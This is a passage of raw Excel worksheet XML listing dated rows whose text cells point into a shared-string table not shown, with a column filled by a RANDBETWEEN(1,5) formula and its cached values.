    <row r="10694" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10694" s="1">
        <v>43331.586412037039</v>
      </c>
      <c r="C10694" t="s">
        <v>16</v>
      </c>
      <c r="F10694">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10695" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10695" s="1">
        <v>43331.576886574076</v>
      </c>
      <c r="C10695" t="s">
        <v>10</v>
      </c>
      <c r="D10695" t="s">
        <v>80</v>
      </c>
      <c r="E10695" t="s">
        <v>9573</v>
      </c>
      <c r="F10695">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10696" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10696" s="1">
        <v>43331.507222222222</v>
      </c>
      <c r="C10696" t="s">
        <v>1189</v>
      </c>
      <c r="E10696" t="s">
        <v>9574</v>
      </c>
      <c r="F10696">
        <f t="shared" ca="1" si="167"/>
        <v>3</v>
      </c>
    </row>
    <row r="10697" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10697" s="1">
        <v>43331.484571759262</v>
      </c>
      <c r="C10697" t="s">
        <v>9575</v>
      </c>
      <c r="D10697" t="s">
        <v>885</v>
      </c>
      <c r="E10697" t="s">
        <v>9309</v>
      </c>
      <c r="F10697">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10698" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10698" s="1">
        <v>43331.42460648148</v>
      </c>
      <c r="C10698" t="s">
        <v>10</v>
      </c>
      <c r="D10698" t="s">
        <v>92</v>
      </c>
      <c r="E10698" t="s">
        <v>9576</v>
      </c>
      <c r="F10698">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10699" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10699" s="1">
        <v>43331.406550925924</v>
      </c>
      <c r="C10699" t="s">
        <v>29</v>
      </c>
      <c r="D10699" t="s">
        <v>20</v>
      </c>
      <c r="E10699" s="2" t="s">
        <v>5768</v>
      </c>
      <c r="F10699">
        <f t="shared" ca="1" si="167"/>
        <v>3</v>
      </c>
    </row>
    <row r="10700" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10700" s="1">
        <v>43331.359085648146</v>
      </c>
      <c r="C10700" t="s">
        <v>10</v>
      </c>
      <c r="D10700" t="s">
        <v>89</v>
      </c>
      <c r="E10700" t="s">
        <v>9577</v>
      </c>
      <c r="F10700">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10701" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A10701" s="1">
        <v>43331.319062499999</v>
      </c>
      <c r="C10701" t="s">
        <v>10</v>
      </c>
      <c r="D10701" t="s">
        <v>89</v>
      </c>
      <c r="E10701" s="2" t="s">
        <v>9578</v>
      </c>
      <c r="F10701">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10702" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10702" s="1">
        <v>43331.206701388888</v>
      </c>
      <c r="C10702" t="s">
        <v>1050</v>
      </c>
      <c r="E10702" t="s">
        <v>9579</v>
      </c>
      <c r="F10702">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10703" s="1">
        <v>43330.917523148149</v>
      </c>
      <c r="C10703" t="s">
        <v>10</v>
      </c>
      <c r="D10703" t="s">
        <v>6</v>
      </c>
      <c r="E10703" t="s">
        <v>9580</v>
      </c>
      <c r="F10703">
        <f t="shared" ca="1" si="167"/>
        <v>3</v>
      </c>
    </row>
    <row r="10704" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10704" s="1">
        <v>43330.894618055558</v>
      </c>
      <c r="C10704" t="s">
        <v>29</v>
      </c>
      <c r="D10704" t="s">
        <v>56</v>
      </c>
      <c r="E10704" s="2" t="s">
        <v>5768</v>
      </c>
      <c r="F10704">
        <f t="shared" ca="1" si="167"/>
        <v>3</v>
      </c>
    </row>
    <row r="10705" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10705" s="1">
        <v>43330.822997685187</v>
      </c>
      <c r="C10705" t="s">
        <v>10</v>
      </c>
      <c r="D10705" t="s">
        <v>94</v>
      </c>
      <c r="E10705" t="s">
        <v>9581</v>
      </c>
      <c r="F10705">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10706" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10706" s="1">
        <v>43330.808807870373</v>
      </c>
      <c r="C10706" t="s">
        <v>10</v>
      </c>
      <c r="D10706" t="s">
        <v>94</v>
      </c>
      <c r="E10706" t="s">
        <v>9582</v>
      </c>
      <c r="F10706">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10707" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10707" s="1">
        <v>43330.790486111109</v>
      </c>
      <c r="C10707" t="s">
        <v>10</v>
      </c>
      <c r="D10707" t="s">
        <v>52</v>
      </c>
      <c r="E10707" t="s">
        <v>9583</v>
      </c>
      <c r="F10707">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10708" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10708" s="1">
        <v>43330.73159722222</v>
      </c>
      <c r="C10708" t="s">
        <v>48</v>
      </c>
      <c r="E10708" t="s">
        <v>9584</v>
      </c>
      <c r="F10708">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10709" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10709" s="1">
        <v>43330.548043981478</v>
      </c>
      <c r="C10709" t="s">
        <v>41</v>
      </c>
      <c r="E10709" t="s">
        <v>9585</v>
      </c>
      <c r="F10709">
        <f t="shared" ca="1" si="167"/>
        <v>2</v>
      </c>
    </row>
    <row r="10710" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10710" s="1">
        <v>43330.408692129633</v>
      </c>
      <c r="C10710" t="s">
        <v>29</v>
      </c>
      <c r="D10710" t="s">
        <v>381</v>
      </c>
      <c r="E10710" s="2" t="s">
        <v>5768</v>
      </c>
      <c r="F10710">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10711" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10711" s="1">
        <v>43330.27957175926</v>
      </c>
      <c r="C10711" t="s">
        <v>461</v>
      </c>
      <c r="D10711" t="s">
        <v>312</v>
      </c>
      <c r="E10711" t="s">
        <v>9586</v>
      </c>
      <c r="F10711">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10712" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10712" s="1">
        <v>43330.142523148148</v>
      </c>
      <c r="C10712" t="s">
        <v>253</v>
      </c>
      <c r="E10712" t="s">
        <v>9587</v>
      </c>
      <c r="F10712">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10713" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10713" s="1">
        <v>43329.932754629626</v>
      </c>
      <c r="C10713" t="s">
        <v>3106</v>
      </c>
      <c r="D10713" t="s">
        <v>39</v>
      </c>
      <c r="E10713" t="s">
        <v>9588</v>
      </c>
      <c r="F10713">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10714" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10714" s="1">
        <v>43329.900219907409</v>
      </c>
      <c r="C10714" t="s">
        <v>29</v>
      </c>
      <c r="D10714" t="s">
        <v>163</v>
      </c>
      <c r="E10714" s="2" t="s">
        <v>5768</v>
      </c>
      <c r="F10714">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10715" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10715" s="1">
        <v>43329.81454861111</v>
      </c>
      <c r="C10715" t="s">
        <v>479</v>
      </c>
      <c r="D10715" t="s">
        <v>56</v>
      </c>
      <c r="E10715" s="2" t="s">
        <v>9589</v>
      </c>
      <c r="F10715">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10716" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10716" s="1">
        <v>43329.798993055556</v>
      </c>
      <c r="C10716" t="s">
        <v>3106</v>
      </c>
      <c r="D10716" t="s">
        <v>71</v>
      </c>
      <c r="E10716" t="s">
        <v>9588</v>
      </c>
      <c r="F10716">
        <f t="shared" ca="1" si="167"/>
        <v>2</v>
      </c>
    </row>
    <row r="10717" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10717" s="1">
        <v>43329.773761574077</v>
      </c>
      <c r="C10717" t="s">
        <v>720</v>
      </c>
      <c r="D10717" t="s">
        <v>124</v>
      </c>
      <c r="E10717" s="2" t="s">
        <v>9590</v>
      </c>
      <c r="F10717">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10718" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10718" s="1">
        <v>43329.770775462966</v>
      </c>
      <c r="C10718" t="s">
        <v>3106</v>
      </c>
      <c r="D10718" t="s">
        <v>750</v>
      </c>
      <c r="E10718" t="s">
        <v>9591</v>
      </c>
      <c r="F10718">
        <f t="shared" ca="1" si="167"/>
        <v>2</v>
      </c>
    </row>
    <row r="10719" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10719" s="1">
        <v>43329.728009259263</v>
      </c>
      <c r="C10719" t="s">
        <v>3106</v>
      </c>
      <c r="D10719" t="s">
        <v>25</v>
      </c>
      <c r="E10719" t="s">
        <v>9588</v>
      </c>
      <c r="F10719">
        <f t="shared" ca="1" si="167"/>
        <v>2</v>
      </c>
    </row>
    <row r="10720" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10720" s="1">
        <v>43329.722013888888</v>
      </c>
      <c r="C10720" t="s">
        <v>178</v>
      </c>
      <c r="D10720" t="s">
        <v>632</v>
      </c>
      <c r="E10720" s="2" t="s">
        <v>9592</v>
      </c>
      <c r="F10720">
        <f t="shared" ca="1" si="167"/>
        <v>2</v>
      </c>
    </row>
    <row r="10721" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10721" s="1">
        <v>43329.715833333335</v>
      </c>
      <c r="C10721" t="s">
        <v>10</v>
      </c>
      <c r="D10721" t="s">
        <v>271</v>
      </c>
      <c r="E10721" s="2" t="s">
        <v>9593</v>
      </c>
      <c r="F10721">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10722" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10722" s="1">
        <v>43329.697164351855</v>
      </c>
      <c r="C10722" t="s">
        <v>156</v>
      </c>
      <c r="D10722" t="s">
        <v>6</v>
      </c>
      <c r="E10722" s="2" t="s">
        <v>9594</v>
      </c>
      <c r="F10722">
        <f t="shared" ca="1" si="167"/>
        <v>2</v>
      </c>
    </row>
    <row r="10723" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10723" s="1">
        <v>43329.67732638889</v>
      </c>
      <c r="C10723" t="s">
        <v>6</v>
      </c>
      <c r="D10723" t="s">
        <v>602</v>
      </c>
      <c r="E10723" t="s">
        <v>9595</v>
      </c>
      <c r="F10723">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10724" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10724" s="1">
        <v>43329.639502314814</v>
      </c>
      <c r="C10724" t="s">
        <v>2138</v>
      </c>
      <c r="D10724" t="s">
        <v>56</v>
      </c>
      <c r="E10724" s="2" t="s">
        <v>9596</v>
      </c>
      <c r="F10724">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10725" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10725" s="1">
        <v>43329.628900462965</v>
      </c>
      <c r="C10725" t="s">
        <v>10</v>
      </c>
      <c r="D10725" t="s">
        <v>80</v>
      </c>
      <c r="E10725" t="s">
        <v>9597</v>
      </c>
      <c r="F10725">
        <f t="shared" ca="1" si="167"/>
        <v>3</v>
      </c>
    </row>
    <row r="10726" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10726" s="1">
        <v>43329.628310185188</v>
      </c>
      <c r="C10726" t="s">
        <v>10</v>
      </c>
      <c r="D10726" t="s">
        <v>20</v>
      </c>
      <c r="E10726" s="2" t="s">
        <v>9598</v>
      </c>
      <c r="F10726">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10727" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10727" s="1">
        <v>43329.623437499999</v>
      </c>
      <c r="C10727" t="s">
        <v>10</v>
      </c>
      <c r="D10727" t="s">
        <v>94</v>
      </c>
      <c r="E10727" s="2" t="s">
        <v>9599</v>
      </c>
      <c r="F10727">
        <f t="shared" ca="1" si="167"/>
        <v>3</v>
      </c>
    </row>
    <row r="10728" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10728" s="1">
        <v>43329.62300925926</v>
      </c>
      <c r="C10728" t="s">
        <v>9064</v>
      </c>
      <c r="D10728" t="s">
        <v>993</v>
      </c>
      <c r="E10728" s="2" t="s">
        <v>9600</v>
      </c>
      <c r="F10728">
        <f t="shared" ca="1" si="167"/>
        <v>3</v>
      </c>
    </row>
    <row r="10729" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10729" s="1">
        <v>43329.621736111112</v>
      </c>
      <c r="C10729" t="s">
        <v>10</v>
      </c>
      <c r="D10729" t="s">
        <v>178</v>
      </c>
      <c r="E10729" t="s">
        <v>9601</v>
      </c>
      <c r="F10729">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10730" s="1">
        <v>43329.602083333331</v>
      </c>
      <c r="C10730" t="s">
        <v>454</v>
      </c>
      <c r="D10730" t="s">
        <v>56</v>
      </c>
      <c r="E10730" t="s">
        <v>9602</v>
      </c>
      <c r="F10730">
        <f t="shared" ca="1" si="167"/>
        <v>2</v>
      </c>
    </row>
    <row r="10731" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10731" s="1">
        <v>43329.59778935185</v>
      </c>
      <c r="C10731" t="s">
        <v>10</v>
      </c>
      <c r="D10731" t="s">
        <v>6</v>
      </c>
      <c r="E10731" t="s">
        <v>9603</v>
      </c>
      <c r="F10731">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10732" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10732" s="1">
        <v>43329.569768518515</v>
      </c>
      <c r="C10732" t="s">
        <v>6</v>
      </c>
      <c r="D10732" t="s">
        <v>114</v>
      </c>
      <c r="E10732" t="s">
        <v>9604</v>
      </c>
      <c r="F10732">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10733" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10733" s="1">
        <v>43329.569745370369</v>
      </c>
      <c r="C10733" t="s">
        <v>222</v>
      </c>
      <c r="E10733" s="2" t="s">
        <v>9605</v>
      </c>
      <c r="F10733">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10734" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10734" s="1">
        <v>43329.567141203705</v>
      </c>
      <c r="C10734" t="s">
        <v>1381</v>
      </c>
      <c r="D10734" t="s">
        <v>367</v>
      </c>
      <c r="E10734" s="2" t="s">
        <v>9606</v>
      </c>
      <c r="F10734">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10735" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10735" s="1">
        <v>43329.553749999999</v>
      </c>
      <c r="C10735" t="s">
        <v>1611</v>
      </c>
      <c r="D10735" t="s">
        <v>33</v>
      </c>
      <c r="E10735" s="2" t="s">
        <v>9607</v>
      </c>
      <c r="F10735">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10736" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10736" s="1">
        <v>43329.502303240741</v>
      </c>
      <c r="C10736" t="s">
        <v>10</v>
      </c>
      <c r="D10736" t="s">
        <v>178</v>
      </c>
      <c r="E10736" t="s">
        <v>9608</v>
      </c>
      <c r="F10736">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10737" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10737" s="1">
        <v>43329.499328703707</v>
      </c>
      <c r="C10737" t="s">
        <v>9609</v>
      </c>
      <c r="D10737" t="s">
        <v>23</v>
      </c>
      <c r="E10737" s="2" t="s">
        <v>9610</v>
      </c>
      <c r="F10737">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10738" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10738" s="1">
        <v>43329.493460648147</v>
      </c>
      <c r="C10738" t="s">
        <v>63</v>
      </c>
      <c r="D10738" t="s">
        <v>46</v>
      </c>
      <c r="E10738" t="s">
        <v>9611</v>
      </c>
      <c r="F10738">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10739" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10739" s="1">
        <v>43329.493298611109</v>
      </c>
      <c r="C10739" t="s">
        <v>48</v>
      </c>
      <c r="E10739" s="2" t="s">
        <v>9612</v>
      </c>
      <c r="F10739">
        <f t="shared" ca="1" si="167"/>
        <v>2</v>
      </c>
    </row>
    <row r="10740" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10740" s="1">
        <v>43329.490891203706</v>
      </c>
      <c r="C10740" t="s">
        <v>3106</v>
      </c>
      <c r="D10740" t="s">
        <v>336</v>
      </c>
      <c r="E10740" t="s">
        <v>9613</v>
      </c>
      <c r="F10740">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10741" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10741" s="1">
        <v>43329.486805555556</v>
      </c>
      <c r="C10741" t="s">
        <v>9614</v>
      </c>
      <c r="D10741" t="s">
        <v>290</v>
      </c>
      <c r="E10741" s="2" t="s">
        <v>9615</v>
      </c>
      <c r="F10741">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
    <row r="10742" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10742" s="1">
        <v>43329.486180555556</v>
      </c>
      <c r="C10742" t="s">
        <v>3106</v>
      </c>
      <c r="D10742" t="s">
        <v>67</v>
      </c>
      <c r="E10742" t="s">
        <v>9588</v>
      </c>
      <c r="F10742">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10743" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10743" s="1">
        <v>43329.464513888888</v>
      </c>
      <c r="C10743" t="s">
        <v>10</v>
      </c>
      <c r="D10743" t="s">
        <v>14</v>
      </c>
      <c r="E10743" t="s">
        <v>9616</v>
      </c>
      <c r="F10743">
        <f t="shared" ca="1" si="167"/>
        <v>3</v>
      </c>
    </row>
    <row r="10744" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10744" s="1">
        <v>43329.463807870372</v>
      </c>
      <c r="C10744" t="s">
        <v>124</v>
      </c>
      <c r="E10744" s="2" t="s">
        <v>9617</v>
      </c>
      <c r="F10744">
        <f t="shared" ca="1" si="167"/>
        <v>3</v>
      </c>
    </row>
    <row r="10745" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10745" s="1">
        <v>43329.453136574077</v>
      </c>
      <c r="C10745" t="s">
        <v>10</v>
      </c>
      <c r="D10745" t="s">
        <v>36</v>
      </c>
      <c r="E10745" s="2" t="s">
        <v>9618</v>
      </c>
      <c r="F10745">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10746" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10746" s="1">
        <v>43329.450057870374</v>
      </c>
      <c r="C10746" t="s">
        <v>3106</v>
      </c>
      <c r="D10746" t="s">
        <v>124</v>
      </c>
      <c r="E10746" t="s">
        <v>9588</v>
      </c>
      <c r="F10746">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10747" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10747" s="1">
        <v>43329.433321759258</v>
      </c>
      <c r="C10747" t="s">
        <v>1068</v>
      </c>
      <c r="D10747" t="s">
        <v>2214</v>
      </c>
      <c r="E10747" s="2" t="s">
        <v>9619</v>
      </c>
      <c r="F10747">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10748" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10748" s="1">
        <v>43329.431990740741</v>
      </c>
      <c r="C10748" t="s">
        <v>301</v>
      </c>
      <c r="D10748" t="s">
        <v>112</v>
      </c>
      <c r="E10748" s="2" t="s">
        <v>9620</v>
      </c>
      <c r="F10748">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10749" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10749" s="1">
        <v>43329.421620370369</v>
      </c>
      <c r="C10749" t="s">
        <v>29</v>
      </c>
      <c r="D10749" t="s">
        <v>232</v>
      </c>
      <c r="E10749" s="2" t="s">
        <v>5768</v>
      </c>
      <c r="F10749">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10750" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10750" s="1">
        <v>43329.420474537037</v>
      </c>
      <c r="C10750" t="s">
        <v>5022</v>
      </c>
      <c r="D10750" t="s">
        <v>381</v>
      </c>
      <c r="E10750" s="2" t="s">
        <v>9621</v>
      </c>
      <c r="F10750">
        <f t="shared" ca="1" si="167"/>
        <v>5</v>
      </c>
    </row>
    <row r="10751" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10751" s="1">
        <v>43329.381886574076</v>
      </c>
      <c r="C10751" t="s">
        <v>10</v>
      </c>
      <c r="D10751" t="s">
        <v>89</v>
      </c>
      <c r="F10751">
        <f t="shared" ca="1" si="167"/>
        <v>2</v>
      </c>
    </row>
    <row r="10752" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10752" s="1">
        <v>43329.371030092596</v>
      </c>
      <c r="C10752" t="s">
        <v>841</v>
      </c>
      <c r="D10752" t="s">
        <v>80</v>
      </c>
      <c r="E10752" s="2" t="s">
        <v>9622</v>
      </c>
      <c r="F10752">
        <f t="shared" ca="1" si="167"/>
        <v>3</v>
      </c>
    </row>
    <row r="10753" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10753" s="1">
        <v>43329.360706018517</v>
      </c>
      <c r="C10753" t="s">
        <v>3106</v>
      </c>
      <c r="D10753" t="s">
        <v>71</v>
      </c>
      <c r="E10753" t="s">
        <v>9588</v>
      </c>
      <c r="F10753">
        <f t="shared" ca="1" si="167"/>
        <v>4</v>
      </c>
    </row>
    <row r="10754" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10754" s="1">
        <v>43329.358668981484</v>
      </c>
      <c r="C10754" t="s">
        <v>8819</v>
      </c>
      <c r="D10754" t="s">
        <v>11</v>
      </c>
      <c r="E10754" s="2" t="s">
        <v>9623</v>
      </c>
      <c r="F10754">
        <f t="shared" ref="F10754:F10817" ca="1" si="168">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="10755" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10755" s="1">
        <v>43329.357361111113</v>
      </c>
      <c r="C10755" t="s">
        <v>10</v>
      </c>
      <c r="D10755" t="s">
        <v>89</v>
      </c>
      <c r="E10755" t="s">
        <v>9624</v>
      </c>
      <c r="F10755">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10756" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A10756" s="1">
        <v>43329.336678240739</v>
      </c>
      <c r="C10756" t="s">
        <v>48</v>
      </c>
      <c r="E10756" s="2" t="s">
        <v>9625</v>
      </c>
      <c r="F10756">
        <f t="shared" ca="1" si="168"/>
        <v>3</v>
      </c>
    </row>
    <row r="10757" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10757" s="1">
        <v>43329.3124537037</v>
      </c>
      <c r="C10757" t="s">
        <v>178</v>
      </c>
      <c r="E10757" s="2" t="s">
        <v>9626</v>
      </c>
      <c r="F10757">
        <f t="shared" ca="1" si="168"/>
        <v>3</v>
      </c>
    </row>
    <row r="10758" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10758" s="1">
        <v>43329.310601851852</v>
      </c>
      <c r="C10758" t="s">
        <v>69</v>
      </c>
      <c r="D10758" t="s">
        <v>993</v>
      </c>
      <c r="E10758" s="2" t="s">
        <v>9627</v>
      </c>
      <c r="F10758">
        <f t="shared" ca="1" si="168"/>
        <v>3</v>
      </c>
    </row>
    <row r="10759" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10759" s="1">
        <v>43329.296863425923</v>
      </c>
      <c r="C10759" t="s">
        <v>229</v>
      </c>
      <c r="D10759" t="s">
        <v>25</v>
      </c>
      <c r="E10759" s="2" t="s">
        <v>9628</v>
      </c>
      <c r="F10759">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10760" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10760" s="1">
        <v>43329.290868055556</v>
      </c>
      <c r="C10760" t="s">
        <v>97</v>
      </c>
      <c r="E10760" t="s">
        <v>9629</v>
      </c>
      <c r="F10760">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10761" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10761" s="1">
        <v>43329.285555555558</v>
      </c>
      <c r="C10761" t="s">
        <v>542</v>
      </c>
      <c r="D10761" t="s">
        <v>336</v>
      </c>
      <c r="E10761" s="2" t="s">
        <v>9630</v>
      </c>
      <c r="F10761">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10762" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10762" s="1">
        <v>43329.277037037034</v>
      </c>
      <c r="C10762" t="s">
        <v>48</v>
      </c>
      <c r="E10762" t="s">
        <v>9631</v>
      </c>
      <c r="F10762">
        <f t="shared" ca="1" si="168"/>
        <v>3</v>
      </c>
    </row>
    <row r="10763" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10763" s="1">
        <v>43329.261354166665</v>
      </c>
      <c r="C10763" t="s">
        <v>3106</v>
      </c>
      <c r="D10763" t="s">
        <v>2139</v>
      </c>
      <c r="E10763" t="s">
        <v>9588</v>
      </c>
      <c r="F10763">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10764" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A10764" s="1">
        <v>43329.255787037036</v>
      </c>
      <c r="C10764" t="s">
        <v>48</v>
      </c>
      <c r="E10764" s="2" t="s">
        <v>9632</v>
      </c>
      <c r="F10764">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10765" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10765" s="1">
        <v>43329.252337962964</v>
      </c>
      <c r="C10765" t="s">
        <v>9633</v>
      </c>
      <c r="D10765" t="s">
        <v>20</v>
      </c>
      <c r="E10765" s="2" t="s">
        <v>9634</v>
      </c>
      <c r="F10765">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10766" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A10766" s="1">
        <v>43329.251469907409</v>
      </c>
      <c r="C10766" t="s">
        <v>461</v>
      </c>
      <c r="E10766" s="2" t="s">
        <v>9635</v>
      </c>
      <c r="F10766">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10767" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10767" s="1">
        <v>43329.23914351852</v>
      </c>
      <c r="C10767" t="s">
        <v>9636</v>
      </c>
      <c r="D10767" t="s">
        <v>750</v>
      </c>
      <c r="E10767" s="2" t="s">
        <v>9637</v>
      </c>
      <c r="F10767">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10768" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A10768" s="1">
        <v>43329.226458333331</v>
      </c>
      <c r="C10768" t="s">
        <v>107</v>
      </c>
      <c r="D10768" t="s">
        <v>194</v>
      </c>
      <c r="E10768" s="2" t="s">
        <v>9638</v>
      </c>
      <c r="F10768">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10769" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10769" s="1">
        <v>43329.200567129628</v>
      </c>
      <c r="C10769" t="s">
        <v>454</v>
      </c>
      <c r="E10769" s="2" t="s">
        <v>9639</v>
      </c>
      <c r="F10769">
